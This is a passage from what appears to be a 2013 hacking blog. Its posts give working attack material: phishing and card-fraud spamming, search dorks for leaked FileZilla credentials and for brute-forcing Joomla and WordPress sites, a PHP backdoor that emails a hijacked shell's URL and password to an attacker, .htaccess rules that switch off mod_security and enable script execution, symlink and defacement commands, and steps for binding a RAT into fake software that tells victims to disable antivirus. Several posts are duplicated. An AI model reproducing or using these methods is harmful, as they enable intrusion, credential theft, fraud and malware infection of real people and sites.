Hi everybody , Joomla Security Scanner v 1.0 is very useful , if you want to find an exploit on a joomla website. Enj0y !
Breaking News
Sunday 31 March 2013
Wordpress Scanner v 1.0
Hi all my friends today i will present you a nice tool for Wordpress wich you can scan with it a website using wordpress and check vulnerability to exploit in localhost and do remote code execution to inject script and modify the website.
Download
Download
Pro Spamming
Hello my friends ^_^ , today i will show you how to spam with pro method and hack cc , depends of you what you want to hack paypal , Alertpay , Mastercard , Visa , American Express etc......
First of all you gonna use the best mailer i used for long time not popular but the best because it has the "SSL" option so when you send your spam letter to your victims they won't receive letter as a spam letter , it will be a verified message inbox , the tool is Sendblaster there is only one version cracked that works 100%
It also has some super templates the extension is ".eml" you can edit any template and also make clone ".eml" of facebook , Hotmail , Twitter , Hotmail , Gmail , Paypal , etc...... to fool your victim and make him believe that you are facebook and some has tried to login to his account for example :D !
In the left there is an option called "sent" where you can insert all informations i advice you to use SMTP server so you can send without limit , another option called Manager Lists is where you can manage your emails list victims , and best thing in this soft is "Sender Email Adress you can put inside a fake email adress and it won't be signaled ^_^ and the rest is very easy phishing hhahahah ! then send and wait Good Chance!
Crack any hash type
Hello friends , i have for you a private program that can crack any hash without wordlist ^_^ your CPU must be powerful that's all , it's coded by a russian friend !
Trace someone in Facebook
Hello all my friendz many people asking how to trace someone in facebook , well some people think that the noob method with command prompt is the only method lol ^_^ closing all tabs and talking to the victim account then typing "netstat -n" no no i have found the method since 2011 and it's still working and private but i decided to share it.Anyway let me explain it !
This method work with Notification that you receive in your email for example if someone comment your status or send you a message on facebook of course you will receive the notification in your email !
so you are A and your victim is B when your victim comment on your thread in facebook in the system of facebook it will say A <===========> B
so where to find your victim ip it's simple just go to your email and to the notification and view the source of the message type ctrl+f then search this:
This method work with Notification that you receive in your email for example if someone comment your status or send you a message on facebook of course you will receive the notification in your email !
so you are A and your victim is B when your victim comment on your thread in facebook in the system of facebook it will say A <===========> B
so where to find your victim ip it's simple just go to your email and to the notification and view the source of the message type ctrl+f then search this:
X-Facebook: from zuckmail
you wil find a code like this ([MTI3LjAuMC4x]) it's coded in base 64 you have to decode to ascii text then you will find the ip of your target Enj0y!
Tool to decode and encode =========>>> http://www.hcidata.info/base64.htm
for more information check the first line x-store-info:
it has all ;)
Cpanel Attacker
Hello my friends , some hackers when trying to shell a server find problem because of the server they try most of exploits such sql , lfi , rfi , exploiting cms like joomla and wordpress , and the success is about 45%
There is a good program coded by an Algerian Hacker 'Ghost-dz' wich can crack the cpanels of the server you are trying to shell simple and works perfectly.
I'm not going to explain how to use because it is very basic ^_^
Download
Hack a Server
Hello my friends , today i will explain you how to hack a server and exploit it ^_^
First thing you gonna do all this from Localhost use "Wamp" or "Easy php". Then upload a shell with full option like my shell ^_^
Now the most important thing is to know what is the version of the server and the kernel version ^_^
We are not going to target a website of the server and try to upload a shell and try to symlink or root ^_^
Linux xxxxxxxxxxx.xxxxxxxxxxx.net 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 E
As we can see Linux and the kernel version is 2.6.32 x86_64
Now what to do ?
Go to www.google.com and type this: Linux 2.6.32 x86_64 exploit
you will find many exploits find the right exploit script upload it in your Localhost then edit it with the IP of your
server target and choose the right port of the exploit if the exploit is SSH (22) , FTP (21) , etc.....
Then use Netcat to make Backconnect from your Shell if Backconnect is not etablished that's mean that your
server target has been patched or you are not using the right port to backconnect or you need to forward
your port.The rest you can do it from putty i'm not going to talk about this here i'm just giving
some educational informations ^_^
Another method is to find the host of the server for example if you ping www.google.com
your port.The rest you can do it from putty i'm not going to talk about this here i'm just giving
some educational informations ^_^
Another method is to find the host of the server for example if you ping www.google.com
Ip is 173.194.34.19
The Host is "par03s02-in-f19.1e100.net" but as you know Google is very secured all their system is from localhost
and most of their services in remote are Filtred , so How many Google Websites of some countries was Hacked
Well they wasn't certified by "Google Inc" so if you scanned them in the past you could find a port open in the server
or the host enabled , even a exploit in the kernel or a Dns Exploit ^_^ if you try to telnet the port 25 (SMTP)
of Google you will find it open certainly "Limited" (.....) but there is no a hacker that can exploit it yet ^_^
Source: Mauritania HaCker Team
Filezilla Exploit
Hello friendz today i'm going to inform you about a dangerous exploit that i discovered since 2009 in filezilla and it's still not patched by filezilla system till now 2013 most of websites using ftp client filezilla don't know about this exploit ^_^ !
So you can find the host , user and the password (login ftp) in the xml files , the files are :
sitemanager.xml and filezilla.xml
So i've made good Dorks :
inurl:sitemanager.xml filetype:xml
or
inurl:filezilla.xml filetype:xml
you can make your own Dorks ^_^ the true hacker always use his brain °-_-°
Enjoy!
Mauritania Attacker.
So you can find the host , user and the password (login ftp) in the xml files , the files are :
sitemanager.xml and filezilla.xml
So i've made good Dorks :
inurl:sitemanager.xml filetype:xml
or
inurl:filezilla.xml filetype:xml
you can make your own Dorks ^_^ the true hacker always use his brain °-_-°
Enjoy!
Mauritania Attacker.
Hack Joomla and Wordpress|
Hello my friends today i will show you a good method to hack Joomla & Wordpress it's not an exploit because exploits of joomla & Wordpress most of them are in the Components & Plugins example and you can also find also other exploits like privilege escalation or restoring password admin with the token code , etc ....... many many exploits now i will show you a nice method ^_^
First we gonna use the best searcher better than google cause it doesn't filter your searching i mean google doesn't show you all about hacking ^_^
First thing click on Tumunu isaretle to select all methods and in the black case write your dorks you can put many dorks in the same time.
Then go to the second menu Tarama then click on Taramaya Basla when the research finish click on kaydet and save the file text we gonna need after.
For example i want to hack some websites of Israel using joomla or Wordpress what are the dorks ?
For Joomla
site:il com_user.israel
site:il option=
site:il templates/beez/
site:il template/atomic
site:il com_user.shalom
site:il com_user.shalit
For Wordpress
site:il wp-content
site:il powered by wordpress
site:il wp-content/themes
site:il wp-content/plugins
site:il ?p= wordpress
After that we gonna use the best cracker ^_^
Don't forget when hacking joomla select Joomla if Wordpress select also Wordpress this cracker is combined and very fast, now how to use very simple you need to use a simple wordlist.
Click on sifre kelimelistesi to select you password list and click on Site ekle to select the websites list that we found we the searcher then click on Basla to start attacking ^_^
I uploaded for you the programs here Download also i added for you a simple good password list
Enjoy ;)
Mauritania Attacker.
First we gonna use the best searcher better than google cause it doesn't filter your searching i mean google doesn't show you all about hacking ^_^
First thing click on Tumunu isaretle to select all methods and in the black case write your dorks you can put many dorks in the same time.
Then go to the second menu Tarama then click on Taramaya Basla when the research finish click on kaydet and save the file text we gonna need after.
For example i want to hack some websites of Israel using joomla or Wordpress what are the dorks ?
For Joomla
site:il com_user.israel
site:il option=
site:il templates/beez/
site:il template/atomic
site:il com_user.shalom
site:il com_user.shalit
For Wordpress
site:il wp-content
site:il powered by wordpress
site:il wp-content/themes
site:il wp-content/plugins
site:il ?p= wordpress
After that we gonna use the best cracker ^_^
Don't forget when hacking joomla select Joomla if Wordpress select also Wordpress this cracker is combined and very fast, now how to use very simple you need to use a simple wordlist.
Click on sifre kelimelistesi to select you password list and click on Site ekle to select the websites list that we found we the searcher then click on Basla to start attacking ^_^
I uploaded for you the programs here Download also i added for you a simple good password list
Enjoy ;)
Mauritania Attacker.
Backdoor Shell
Hey friends what's up ! many friendz asked me about Backdooring shells well it's very easy some hackers made it hard for other 'Lammerz' ihihhihiihi XD ! if you want to backdoor a shell it's very easy you have just to place a simple php code in the shell call it what you want example license.php that's all then you can receive all in your email !
CODE:
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.6 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
if (!empty($web)) { @mail("writeyouremailhere",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
if you have some knowledge you can develop this code and hack more ^_^
Enjoy!
don't forget to write your email in the code
Bypass Uploading Shell in Joomla
Hello my friendz , today i will show you how to bypass uploading shell in joomla , we know basic methods for uploading shell in joomla !
*Editing Templates with shell code
*Adding php types in configuration and uploading shell
*Uploading shell sometimes as .php;.jpg
*Using some components to upload shell
etc..............
Well it's so easy there is a method to upload shell that work 100% , you have just to go to extensions in the panel and upload a rar file inside the rar you have to put your shell as ".php" example shell.php then go totmp folder and add your shell so it will look like this:
www.site.com/tmp/shell.php
Enjoy ;)
*Editing Templates with shell code
*Adding php types in configuration and uploading shell
*Uploading shell sometimes as .php;.jpg
*Using some components to upload shell
etc..............
Well it's so easy there is a method to upload shell that work 100% , you have just to go to extensions in the panel and upload a rar file inside the rar you have to put your shell as ".php" example shell.php then go totmp folder and add your shell so it will look like this:
www.site.com/tmp/shell.php
Enjoy ;)
Bypass Litespeed Symlink
Hello my friendz , many people asked me how to bypass symlink in Litespeed ???
well i will explain a method that can bypass 90% of Litespeed servers.
code php: ls -la /etc/valiases/fbi.gov
code php:
test.shtml
ln -s /home/user/public_html/configuration.php test.shtml
.htaccess code:
Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php
Mauritania Attacker.
well i will explain a method that can bypass 90% of Litespeed servers.
code php: ls -la /etc/valiases/fbi.gov
code php:
test.shtml
ln -s /home/user/public_html/configuration.php test.shtml
.htaccess code:
Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php
Mauritania Attacker.
Bypass Server Security 100%
Hello my friendz , today i will explain you how to bypass the security of the any server 100%
First thing if you can't use python , perl or cgi script to execute commands after giving to the script CHMOD 0755 the solution is to upload this variable php and edit it with the name of the file that you want to execute
exemple of a file: "perl.pl"
CODE:
<?
chmod("perl.pl" , 0755);
?>
Then save this file as ".php" extension.
If the host is very secured and you can't read directories or upload a file or edit a file just use this ".htaccess"
CODE:
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine Off
</IfModule>
Remember if perl don't work with the variable php just use this ".htaccess"
CODE:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl
For Python also same but change ".pl" to ".py" for cgi script use this ".htaccess"
CODE:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .root
AddHandler cgi-script .root
AddHandler cgi-script .root
If you want to Bypass Uploads Options and upload shell in another extension use this ".htaccess" :
CODE:
<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
For more Information check some old pastebin i posted ^_^
http://pastebin.com/NapunGnJ
http://pastebin.com/VJQN4AvF
You can find many if you search in Google Enj0y ;)
Mauritania Attacker.
Bypass Index Joomla
Hello my friends , many hackers find a big problem when they upload shell on a joomla website and the permission doesn't allow to edit files like "index.php"
Well i will show you how to bypass the permission !!!!
First thing upload a perl script or python or cgi like you want.
then go to the direction where you want to edit (deface) your file like this:
cd /home/user/public_html/
Then type this command :
echo 'put here your deface code' > /home/user/public_html/index.php
Mauritania Attacker.
Well i will show you how to bypass the permission !!!!
First thing upload a perl script or python or cgi like you want.
then go to the direction where you want to edit (deface) your file like this:
cd /home/user/public_html/
Then type this command :
echo 'put here your deface code' > /home/user/public_html/index.php
Mauritania Attacker.
Pro Sql Injection
Hello my friends today i will show you the best method to exploit sql injection ^_^
as you know we all know Havij , Sql map , Webcruiser , etc..... you can also exploit sql injection with hackbar or manually.
The best Software that have some private features is Pangolin Created By Chinese Hackers long time
i did many research from Google to find the pro version but no one could crack it so i decided to
crack it ^_^ and i could success to crack without any error ^_^
you can check the website of the company http://nosec.org/en/productservice/pangolin/
and you can't find it cracked , just do a research on Google ^_^ all versions you can find that says
Cracked are fake and binded with a server ^_^ Enj0y ;)
DOWNLOAD
Author: Mauritania Attacker
Source: Mauritania HaCker Team
Hack Pc easy
Hello my friends ^_^ today i will introduce you a simple method to hack a pc without trying to scan Ip
of your victim and trying to find a port , well it's simple ^_^ wtf ^_________________________^
First thing we gonna use the best RAT "Unknown Logger" then we gonna bind our server into a Facebook
Software.
okay i uploaded for you all the necessary files here DOWNLOAD
Files contains:
*The Rat
*A Facebook software wich we gonna use to bind our virus inside it
*Spoofer wich can spoof extension for example change ".exe" to ".jpg"
ok let's start ^_^ but before opening any files you can scan the files online to be sure that i'm not here
for hacking people or something i'm just sharing knowledge ^_^
ok open the RAT and follow the pictures:
After that click on Build then yo gonna find your server in the folder "Mauritania" don't execute it ^_^
you are not going to hack yourself ^_^. Now we gonna bind our server with that Facebook Soft
so we can fool our Victims , that soft works perfectly it recovers logins facebook stored in your pc ^_^
If u want your server as an image just use that spoofer to change the extension to ".jpg" any extension
you want.
Now how to bind your server inside that soft very easy you have already the tool in your pc ^_^
Just go to cmd and type :
iexpress and click enter a pop up will open see the image:
How to use Iexpress Binder???
1. Go to Start ->Run and type- iexpress and hit on OK.
2. You will get something like this:
3. Hit on Next twice. In “Package Title”, enter the name of the software with which you are going to bind your keylogger server. I am binding my Cybergate server with Ultrasurf. So, I’ll enter Ultrasurf.
4. In Confirmation Prompt, hit on “Prompt User with” and enter something like this:
“Windows will install necessary files. Please disable your Antivirus before further installation proceeds.”
So, whenever victim will run our binded file, he will get a message alert to disable his antivirus. This step helps us in bypassing antivirus detection.
Hit on Next twice.
5. You will come to “Packaged files” interface. Hit on Add and select the two files you want to bind. Hit on Next.
6. Now, this one is important. In Install Program to Launch pane, select the files as mentioned:
Install Program: Select your server file.
Post Install Command: Select your software (.exe file) with which you are gonna bind the server.
7. Hit on Next and select “Hidden”. Click on Next twice.
8. In Package Name And Options, hit on Browse and select the path where you want to save the binded file. Also, check “Hide File Extracting Animation from User” and hit on Next.
9. In Configure Restart, select “No Restart” and hit on Next. In Save Self Extraction Directive, select “Don’t save” and hit on Next twice. Iexpress will start binding file for you. Finally, hit on Finish to complete the binding process.
Now how to spread you server just make many pastebin Docs and upload it on many Websites
Like Mediafire , Zippyshare , etc.... Choose your own way ^_^
Author: Mauritania Attacker
Source: Mauritania HaCker Team
Decrypt Hash Wordpress
Well i will share my private method and you will see that it's very easy to crack any wordpress hash ^_^
First Download Passwords Pro ==============>>> Click here
and now the most important thing is to use the following module : MD5(Unix);phpBB3;Wordpress
Just add the module inside the soft and you don't need to use a wordlist and wait millions of
years ^_^ the rest depends from your CPU
Enj0y ^_^
Saturday 23 March 2013
Subway Surfer Cheats!!!
Subway Surfer cheats
Subway Surfer’s is ruling the Android and iOS gaming platform, people are just trying to explore the depth of this game, its environment, gaming skills, power up’s and awesome upgrades have made this game a top level companion of , so people are even in search of some cheats so that they can easily get new upgrades easier and faster. Well I have already posted on how you can game for unlimited coins and upgrades but today I would be showing you how you can hack your subway surfer’s and get all those heavy coins and upgrades for free. Subway Surfer cheats
So now using few files you can easily cheat out your Android and iOS version, so I will be explaining below for both devices, so jump in and lets get started.
Subway Surfer’s Cheats for Android
Things you will need ?
- Download Cheat Files.
- Subway Surfer’s Game Installed.
- A simple File Explorer (ES File Explorer)
So now if you are on android device you do not need any additional software to do this stuff but you will need few things that you can grab from your play store market for free. Subway Surfer cheats
- Make sure you have downloaded everything mentioned on the right.
- Now just extract the Subway Surfers Hack file and your will find a folder in it that contains 3 files those are the file that will provide you with unlimited coins and upgrades.
- Now I hope your have installed the game in your device just navigate to Settings > Apps > Manage Apps > Subway Surfer’s and hit Clear Data.
- Now copy these 3 files to your memory card and open file manager and navigate tosdcard/Android/data/com.kiloo.subwaysurf/files/
- Now you will see three files already there so replace them up with the 3 files your have downloaded.
- That’s it now close and restart your game and see unlimited coins ready for some cash out. So now just head over and purchase some upgrades.
Subway Surfer’s Cheats for iOS
Things you will need ?
- Download Cheat Files.
- Subway Surfer’s Game Installed.
- DiskAid tool for exploring iOS device & transferring stuff.
So now we have cheated out the Android version above, we are going to see if we can cheat out the iOS version, well yes we can but it needs little more effort as it includes a software to be used as we did in . So let’s see how its done. Subway Surfer cheats
- Make sure you have everything mentioned on the right to get this working.
- Now install the game on your device and download the diskaid software to your computer.
- Now connect your device to your computer and open DiskAid utility. Now right under Apps you will see Subway Surfer’s click on it.
- Now on the right you will see three file’s mentioned as usual, if not it might be hiding under documents folder or something so check it out.
- Now once again just copy the 3 downloaded files and replace them with files already present in that folder.
- Now disconnect your device from DiskAid software and close your game entirely, now re open your game see it might be having unlimited coins with which you can easily purchase upgrades and other stuff.
so here is all for Subway Surfer cheats you can make all power up and many more if any problem just comment down and like the post. stay tuned
also check for Temple Run 2 Cheats
Subscribe to:
Posts (Atom)